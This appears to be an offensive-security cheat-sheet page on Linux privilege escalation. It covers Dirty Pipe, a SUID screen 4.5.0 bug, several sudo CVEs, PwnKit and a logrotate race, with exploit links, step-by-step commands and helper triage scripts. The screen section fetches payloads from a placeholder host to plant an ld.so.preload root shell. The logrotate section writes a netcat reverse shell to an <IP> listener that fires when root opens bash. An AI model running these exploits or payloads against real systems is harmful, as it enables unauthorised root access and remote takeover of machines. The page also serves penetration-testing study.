# Linux

## Index

<table><thead><tr><th width="265">Name</th><th>CVE</th><th>Exploit</th></tr></thead><tbody><tr><td><a href="#dirty-pipe">Dirty Pipe</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2022-0847">CVE-2022-0847</a></td><td><a href="https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits">Exploit</a></td></tr><tr><td><a href="#screen-4.5.0">Screen 4.5.0</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2017-5618">CVE-2017-5618</a></td><td><a href="https://www.exploit-db.com/exploits/41154">Exploit</a></td></tr><tr><td><a href="#sudo-chroot">Sudo - Chroot</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2025-32463">CVE-2025-32463</a></td><td><a href="https://github.com/pr0v3rbs/CVE-2025-32463_chwoot">Exploit</a></td></tr><tr><td><a href="#sudo-baron-samedit">Sudo - Baron Samedit</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-3156">CVE-2021-3156</a></td><td><a href="https://github.com/blasty/CVE-2021-3156">Exploit</a></td></tr><tr><td><a href="#sudo-runas-all">Sudo - Runas ALL</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2019-14287">CVE-2019-14287</a></td><td><a href="https://www.sudo.ws/security/advisories/minus_1_uid/">Exploit</a></td></tr><tr><td><a href="#pwnkit-polkit">PwnKit - Polkit</a></td><td><a href="https://nvd.nist.gov/vuln/detail/CVE-2021-4034">CVE-2021-4034</a></td><td><a href="https://github.com/arthepsy/CVE-2021-4034">Exploit</a></td></tr><tr><td><a href="#logrotate">Logrotate</a></td><td>none</td><td><a href="https://github.com/whotwagner/logrotten">Exploit</a></td></tr></tbody></table>

### Dirty Pipe

[Exploit](https://github.com/AlexisAhmed/CVE-2022-0847-DirtyPipe-Exploits) for kernels from 5.8 up to the fixes in 5.16.11, 5.15.25 and 5.10.102 (check `uname -r`; distribution kernels often carry the fix under an older version string, so a version match means "try it", not "vulnerable"). Any local user can use it; no SUID binary or sudo entry is required. The repo builds two variants: `exploit-1` (below) and `exploit-2`, which takes the path of a SUID binary to hijack instead of editing `/etc/passwd`.

{% code overflow="wrap" %}

```bash
# gcc is needed wherever you build (the target, or a box with a matching glibc)
sudo apt-get install gcc
chmod +x compile.sh
./compile.sh
```

{% endcode %}

{% code overflow="wrap" %}

```bash
# overwrites root's entry in /etc/passwd and drops a root shell; the exploit backs up
# and restores the original file, verify the restore before you leave the box
./exploit-1
```

{% endcode %}

### Screen 4.5.0

[Exploit](https://www.exploit-db.com/exploits/41154) for GNU screen 4.5.0 installed SUID root: it opens the `-L` logfile with root privileges, so an arbitrary root-owned file (here `/etc/ld.so.preload`) can be created and written. Confirm the SUID bit first; without it the bug is harmless.

{% code overflow="wrap" %}

```bash
# needs gcc on the target: the script compiles libhax.c and rootshell.c in /tmp
chmod +x 41154.sh
./41154.sh
```

{% endcode %}

If gcc is not available on the target, build `libhax.so` and `rootshell` from the C sources embedded in 41154.sh on a machine with a compatible glibc, serve them over HTTP, and run the script's steps by hand. `screen-4.5.0` below is the name of the SUID binary on the target this was written for; substitute whatever `find / -perm -4000 -name 'screen*' 2>/dev/null` reports.

```bash
# built elsewhere from the sources in 41154.sh:
#   gcc -fPIC -shared -ldl -o libhax.so libhax.c
#   gcc -o rootshell rootshell.c
cd /tmp
wget http://<IP>/libhax.so
wget http://<IP>/rootshell
chmod +x /tmp/rootshell

# SUID screen 4.5.0 creates its -L logfile as root, so the session output
# (the echo) lands in /etc/ld.so.preload; umask 000 as in 41154.sh
cd /etc/
umask 000
screen-4.5.0 -D -m -L ld.so.preload echo -ne "\x0a/tmp/libhax.so"
# the next SUID screen run preloads libhax.so, whose constructor makes
# /tmp/rootshell SUID root and removes ld.so.preload
screen-4.5.0 -ls
/tmp/rootshell
```

### Sudo - Baron Samedit

[Exploit](https://github.com/blasty/CVE-2021-3156) for sudo 1.8.2 through 1.8.31p2 and 1.9.0 through 1.9.5p1 (fixed in 1.9.5p2). The exploit carries hard-coded offsets per distribution build (1.8.21, 1.8.27, 1.8.31, 1.9.2 and others), so match the target's exact build. Any local user can trigger it; no sudoers entry is required. Distributions backported the fix without bumping the version, so confirm behaviourally: `sudoedit -s /` answering `sudoedit: /: not a regular file` is vulnerable, while `usage: sudoedit ...` means patched.

Other [Exploit](https://github.com/ashok5141/OSCP/blob/main/Linux/exploit_nss.py) (the NSS-library variant, a single Python file with no per-build offsets)

### Sudo - Chroot

[Exploit](https://github.com/pr0v3rbs/CVE-2025-32463_chwoot) for sudo 1.9.14 through 1.9.17 (fixed in 1.9.17p1). Any local user can use it: sudo's `-R`/`--chroot` option resolves `/etc/nsswitch.conf` inside the user-supplied chroot before privileges are dropped, so an attacker-controlled NSS module is loaded as root. No sudoers entry is needed.

### Sudo - Runas ALL

[Exploit](https://www.sudo.ws/security/advisories/minus_1_uid/) for sudo before 1.8.28 (fixed in 1.8.28). Unlike the other sudo bugs on this page it needs an existing sudoers entry, described below.

Exploiting the bug requires that the user have sudo privileges that allow them to run commands with an arbitrary user ID. Typically, this means that the user’s sudoers entry has the special value `ALL` in the Runas specifier.

ex. `alice myhost = (ALL) /usr/bin/id`

If a sudoers entry is written to allow the user to run a command as any user except root, the bug can be used to avoid this restriction.

ex. `bob myhost = (ALL, !root) /usr/bin/vi`

{% code overflow="wrap" %}

```bash
# uid -1 and its unsigned form 4294967295 are both converted to 0, so the
# command runs as root even though (ALL, !root) was meant to forbid it
sudo -u#-1 vi
sudo -u#4294967295 vi
```

{% endcode %}
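The version ranges quoted in the Dirty Pipe, Baron Samedit, Chroot and Runas ALL sections are easy to misread by eye (sudo's `p` patch levels, kernel release suffixes like `-91-generic`), so here is an added triage script, written for this page rather than taken from any of the linked exploit repositories. It normalises `uname -r` and `sudo -V` output and prints which of this page's CVEs are worth trying. The ranges are upstream ones and distributions backport fixes without changing the version string, so a hit is a lead, not a confirmation; for Baron Samedit the behavioural `sudoedit -s /` check stays decisive. The function and variable names are this example's own.

```sh
#!/bin/sh
# Added triage for the version ranges on this page (not taken from any linked repo).
# Upstream ranges only: distributions backport fixes without bumping the version,
# so treat every hit as "test it", not "confirmed".

# ver_cmp A B -> prints -1, 0 or 1 for A<B, A=B, A>B.
# "1.9.5p2" is read as 1.9.5.2 (sudo patch level); suffixes such as "-91-generic"
# or "-1ubuntu1.2" are cut at the first character that is not a digit or a dot.
ver_cmp() {
    a=$(printf '%s' "$1" | sed 's/p/./; s/[^0-9.].*$//')
    b=$(printf '%s' "$2" | sed 's/p/./; s/[^0-9.].*$//')
    case "$a" in *.*) ;; *) a="$a.0" ;; esac   # "5" -> "5.0" so cut -s sees a field
    case "$b" in *.*) ;; *) b="$b.0" ;; esac
    i=1
    while [ "$i" -le 4 ]; do
        x=$(printf '%s\n' "$a" | cut -s -d. -f"$i"); x=${x:-0}
        y=$(printf '%s\n' "$b" | cut -s -d. -f"$i"); y=${y:-0}
        if [ "$x" -lt "$y" ]; then echo -1; return 0; fi
        if [ "$x" -gt "$y" ]; then echo 1; return 0; fi
        i=$((i + 1))
    done
    echo 0
}

# in_range V LOW HIGH -> true when LOW <= V <= HIGH
in_range() {
    [ "$(ver_cmp "$1" "$2")" -ge 0 ] && [ "$(ver_cmp "$1" "$3")" -le 0 ]
}

# dirtypipe_candidate RELEASE -> true when RELEASE (as printed by `uname -r`) falls in
# the CVE-2022-0847 window: 5.8 up to 5.17, minus the stable branches fixed in
# 5.10.102, 5.15.25 and 5.16.11 (5.11-5.14 were end-of-life and never patched upstream).
dirtypipe_candidate() {
    k=$1
    if [ "$(ver_cmp "$k" 5.8)" -lt 0 ] || [ "$(ver_cmp "$k" 5.17)" -ge 0 ]; then
        return 1
    fi
    case "$k" in
        5.10.*) [ "$(ver_cmp "$k" 5.10.102)" -lt 0 ] ;;
        5.15.*) [ "$(ver_cmp "$k" 5.15.25)" -lt 0 ] ;;
        5.16.*) [ "$(ver_cmp "$k" 5.16.11)" -lt 0 ] ;;
        *)      return 0 ;;
    esac
}

# sudo_triage VERSION -> one line per sudo CVE on this page whose upstream range covers VERSION
sudo_triage() {
    v=$1
    if [ "$(ver_cmp "$v" 1.8.28)" -lt 0 ]; then
        echo "CVE-2019-14287 runas-all (needs a (ALL) or (ALL, !root) Runas entry)"
    fi
    if in_range "$v" 1.8.2 1.8.31p2 || in_range "$v" 1.9.0 1.9.5p1; then
        echo "CVE-2021-3156 baron-samedit (confirm: sudoedit -s / -> 'not a regular file')"
    fi
    if in_range "$v" 1.9.14 1.9.17; then
        echo "CVE-2025-32463 chroot"
    fi
}

# Against the live host: sh triage.sh --live
if [ "${1:-}" = "--live" ]; then
    kr=$(uname -r)
    if dirtypipe_candidate "$kr"; then echo "CVE-2022-0847 dirty-pipe (kernel $kr)"; fi
    sv=$(sudo -V 2>/dev/null | sed -n 's/^Sudo version //p')
    if [ -n "$sv" ]; then sudo_triage "$sv"; fi
fi
```

Run `sh triage.sh --live` on the target, or source the file and call `sudo_triage 1.8.31` or `dirtypipe_candidate 5.15.20` with any version string by hand. The script is pure POSIX sh (no `local`, no bash arrays) so it runs under whatever `/bin/sh` the target has.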

### PwnKit - Polkit

[Exploit1](https://github.com/arthepsy/CVE-2021-4034) / [Exploit2](https://github.com/ly4k/PwnKit) for every pkexec release before the January 2022 fix (upstream 0.120; the `0.105-26` figure is a Debian/Ubuntu package version). Distributions backported the fix without changing the upstream `0.105` number, so `pkexec --version` alone is not conclusive: compare the package version against your distro's advisory, and check that `pkexec` is SUID root, which the exploit requires.

{% code overflow="wrap" %}

```bash
pkexec --version   # upstream version only; patched distro builds still report 0.105
```

{% endcode %}

{% code overflow="wrap" %}

```bash
gcc cve-2021-4034-poc.c -o cve-2021-4034-poc
./cve-2021-4034-poc
```

{% endcode %}

### Logrotate

[Exploit](https://github.com/whotwagner/logrotten), tested by its author against logrotate 3.8.6, 3.11.0, 3.15.0 and 3.18.0. There is no CVE: it is a race in how logrotate rotates files, and upstream treats it as a configuration issue.

You need a log file that logrotate rotates as root with the `create` option and whose directory you control. logrotten waits (via inotify) for the rotation, swaps the log directory for a symlink to `/etc/bash_completion.d` so that the freshly created log file lands there, and writes the payload into it; the payload runs the next time root opens an interactive bash shell. Look through `/etc/logrotate.conf` and `/etc/logrotate.d/` for candidate stanzas, and at `/etc/cron.daily/logrotate` (or the systemd timer) for when the rotation fires. Then run the exploit against the writable log file.

{% code overflow="wrap" %}

```bash
gcc -o logrotten logrotten.c
```

{% endcode %}

Prepare the payload (replace `<IP>` with your listener; `nc -e` needs a netcat build that supports it, otherwise swap in a different reverse shell):

{% code overflow="wrap" %}

```bash
# single quotes matter: a double-quoted `id -u` is expanded by your own shell
# before the file is written, baking in your uid instead of testing root's
echo 'if [ "$(id -u)" -eq 0 ]; then (/bin/nc -e /bin/bash <IP> 3333 &); fi' > payloadfile
```

{% endcode %}

If the `create` option is set in the logrotate config (plain rotation, no compression):

{% code overflow="wrap" %}

```bash
./logrotten -p ./payloadfile /tmp/log/pwnme.log
```

{% endcode %}

If the `compress` option is set, add `-c` (and `-s 4`, as the README recommends):

{% code overflow="wrap" %}

```bash
./logrotten -p ./payloadfile -c -s 4 /tmp/log/pwnme.log
```

{% endcode %}
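Finding a candidate by hand means reading every stanza in `/etc/logrotate.conf` and `/etc/logrotate.d/*` for `create` and `compress` and then checking permissions. The script below is an added helper written for this page (it is not part of logrotten): it parses a logrotate config, reports both options per log file (global options are inherited, `nocreate`/`nocompress` inside a stanza override them) and checks whether the current user can write to the file and its directory. The `demo` function runs it over a constructed sample config in a temporary directory; on a target, point `logrotate_triage` at the real files. `include` directives are not followed, and the function and variable names are this example's own.

```sh
#!/bin/sh
# Added helper (not part of logrotten): walk a logrotate config and, for every
# stanza, report the two options that pick the logrotten mode plus whether the
# current user can reach the log file and its directory.

# logrotate_triage CONFIG
# prints: <logfile> create=<yes|no> compress=<yes|no> file_writable=<yes|no> dir_writable=<yes|no>
logrotate_triage() {
    awk '
        BEGIN { inside = 0; gc = 0; gz = 0 }
        /^[[:space:]]*#/ { next }                 # comment
        NF == 0 { next }                          # blank line
        inside == 0 && /[{][[:space:]]*$/ {       # "path [path ...] {" opens a stanza
            sub(/[{][[:space:]]*$/, "")           # drop the brace, re-split the line
            inside = 1; n = NF
            for (i = 1; i <= n; i++) paths[i] = $i
            c = gc; z = gz                        # start from the global defaults
            next
        }
        inside == 1 && /^[[:space:]]*[}]/ {       # stanza closed: report every path in it
            inside = 0
            for (i = 1; i <= n; i++) print paths[i], c, z
            next
        }
        $1 == "create"     { if (inside) c = 1; else gc = 1; next }
        $1 == "nocreate"   { if (inside) c = 0; else gc = 0; next }
        $1 == "compress"   { if (inside) z = 1; else gz = 1; next }
        $1 == "nocompress" { if (inside) z = 0; else gz = 0; next }
    ' "$1" |
    while read -r p c z; do
        cy=no; zy=no; fw=no; dw=no
        if [ "$c" = 1 ]; then cy=yes; fi
        if [ "$z" = 1 ]; then zy=yes; fi
        if [ -w "$p" ]; then fw=yes; fi
        if [ -w "$(dirname "$p")" ]; then dw=yes; fi
        printf '%s create=%s compress=%s file_writable=%s dir_writable=%s\n' "$p" "$cy" "$zy" "$fw" "$dw"
    done
}

# demo: constructed sample config in a temp dir (not taken from a real host)
demo() {
    t=$(mktemp -d)
    mkdir "$t/app"
    : > "$t/app/pwnme.log"
    cat > "$t/logrotate.conf" <<EOF
# global options, inherited by every stanza below
compress
$t/app/pwnme.log {
    daily
    rotate 4
    create 0644 root root
}
/var/log/other.log {
    nocompress
    nocreate
}
EOF
    logrotate_triage "$t/logrotate.conf"
    rm -rf "$t"
}

if [ "${1:-}" = "--demo" ]; then demo; fi
```

On a target: `for f in /etc/logrotate.conf /etc/logrotate.d/*; do logrotate_triage "$f"; done`, then use the plain `logrotten` call for `create=yes compress=no` stanzas and add `-c` where `compress=yes`. `dir_writable=yes` is the column that matters, since the tool has to rename the log's directory.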

